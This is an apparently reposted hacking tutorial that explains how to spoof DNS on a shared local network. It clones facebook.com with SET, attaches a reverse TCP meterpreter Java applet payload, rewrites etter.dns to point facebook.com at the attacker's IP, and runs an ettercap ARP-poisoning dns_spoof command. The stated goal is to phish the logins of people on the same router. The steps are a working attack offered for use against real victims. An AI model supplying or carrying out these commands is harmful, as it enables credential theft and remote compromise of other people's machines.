DNS Spoffing [Man in middle attack

 🌀  🌀


What Is DNS Spoofing?

DNS spoofing is an attack that can categorize under Man-In-The-Middle-Attack, beside DNS Spoofing MIMA contain:

-ARP poisoning

-Sessions hijacking

-SSL hijacking

-DNS Spoofing


Ill only be showing u DNS Spoofing , For now .. !


How does it work ?

Man in the middle attack means that the hacker will clone a specific web site such as facebook.com/twitter/google etc.... and force the victim to enter his cloned page , And phishe his login creedintals ... ( this only works on ur local connection ) Like , You can phishe People on the same router u are.

To under stand It more likely , Ill show u a pic for example:

Posted Image

I guess u got it ?



Requirements:

1-Linux operating system ( IMPORTANT )

2-Basic knowledge with Linux commands ( Important )

3-A brain ( SUPEREME INPORTANT)


First off ill be adding pics when i get some time , Cus its pain in the ass to show u every thing with pics .

Steps:

1-Setting Java applet attack / Clonning a specific web site " Ill clone facebook.com "

2-Setting the DNS spoofing blugin useing ettercap


First off:

We will open a terminal And type in


cd /pentest/exploits/set


Then


./SET


Now we will get our exploit on and running , Now we are going to choose it like so :


WebSite attack vectors/Java applet attack method /Clone web site / Enter the web site u want to clone ..

Then after it finish clonning , Use the

TCP reverse meter preter payload

Then we will use the following exploits : shikata_ga_nai


Insert an opened port after that ...

It will ask you to

create a Linux/OSX reverse_tcp meterpreter Java Applet payload also?

And we will type "no"


Then we are done for the java applet setting ....

Now comes the reall hacking

Open a new terminal and type


locate etter.dns


Then it will show u a directory of the tool


nano <Directory of the tool>



Without the <> ofc.

Now it will load the tool , We will scroll down till we see

3 lines with microsoft.com

Change them all to facebook.com without removed the *. in the 2nd line

And without closing this terminal , We will open a new one , And type


ifconfig


Now we will copy our local addrress its usually like


192.168.2.xxx



And ofc we will replace it with the ip's infront of the 3 lines of microsoft.com

Now we will press CTRL+O and type y And then y again untill it says

xx lines wrote

Then we will press CTRL+X

Then we will execute what we have done useing


ettercap -T -q -i eth0 -P dns_spoof -M arp // //


Then it will load our Etter cap Wink and then It will tell you

facebook.com spoofed to [192.168.2.xx]

Now every one on ur own local connection Visits facebook.com

and insert his infoz and login , You will be informated with the login infoz Wink.


Present by:-msijbkk


❌ Share and #pin our channel ❌

No comments:

Post a Comment

What is Prototype content functions in JavaScript Framework Programming.mp4

  Download now Enjoy! Follow us for more...